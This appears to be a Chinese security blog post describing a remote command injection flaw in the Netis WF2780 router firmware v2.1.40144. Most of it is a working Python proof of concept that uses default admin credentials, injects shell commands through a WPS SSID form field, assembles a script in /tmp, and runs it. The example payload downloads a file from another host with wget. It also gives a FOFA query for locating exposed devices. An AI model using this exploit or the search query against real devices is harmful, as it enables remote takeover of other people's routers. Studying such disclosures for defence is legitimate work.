免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

Netis WF2780 远程命令执行漏洞

漏洞影响

Netis WF2780 v2.1.40144版本

https://www.netis-systems.com/Suppory/de_details/id/1/de/189.html

漏洞描述

Netis是一家专门从事网络通信设备的制造商。他们提供各种网络设备,包括路由器、交换机、无线接入点和网络适配器等。Netis WF2780 v2.1.40144版本在bin/cgitest.cgi文件的函数igd_wps_set中有一个远程命令注入漏洞。会导致被远控。

FOFA搜索语句

title='AP setup' && header='netis'

poc

python poc文件内容如下


#!/usr/bin/env python3

import urllib.parse
import socket 


def send_cmd(ip, port, cmd):
    cmd = "\";"+cmd+";\""
    #print(f"cmd:{cmd}")
    body = "wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=" + urllib.parse.quote(cmd)
    request = "POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1\r\n"
    request += f"Host: {ip}\r\n"
    request += "Content-Length: {}\r\n".format(len(body))
    request += "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    request += "Cache-Control: no-cache\r\n"
    request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\r\n"
    request += "content-type: application/x-www-form-urlencoded\r\n"
    request += f"Origin: http://{ip}\r\n"
    request += f"Referer: http://{ip}/index.htm\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Accept-Language: zh-CN,zh;q=0.9\r\n"
    request += "Connection: close\r\n\r\n"
    request += body
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.settimeout(8)
    c.connect((ip,port))
    c.send(request.encode())
    c.recv(1024)
    #print(c.recv(1024))

def main(ip, port, cmd):
    for i in range(len(cmd)):
        if i == 0:
            _cmd = f"echo \'{cmd[i]}\\c\' > /tmp/s.sh"
        else:
            _cmd = f"echo \'{cmd[i]}\\c\' >> /tmp/s.sh"
        send_cmd(ip, port, _cmd)
    
    send_cmd(ip, port, "chmod 777 /tmp/s.sh")
    send_cmd(ip, port, "sh /tmp/s.sh")
    


if __name__ == "__main__":
    main("192.168.1.1", 80, "cd /tmp;wget http://192.168.1.2:8888/a")

修复建议

升级到最新版本。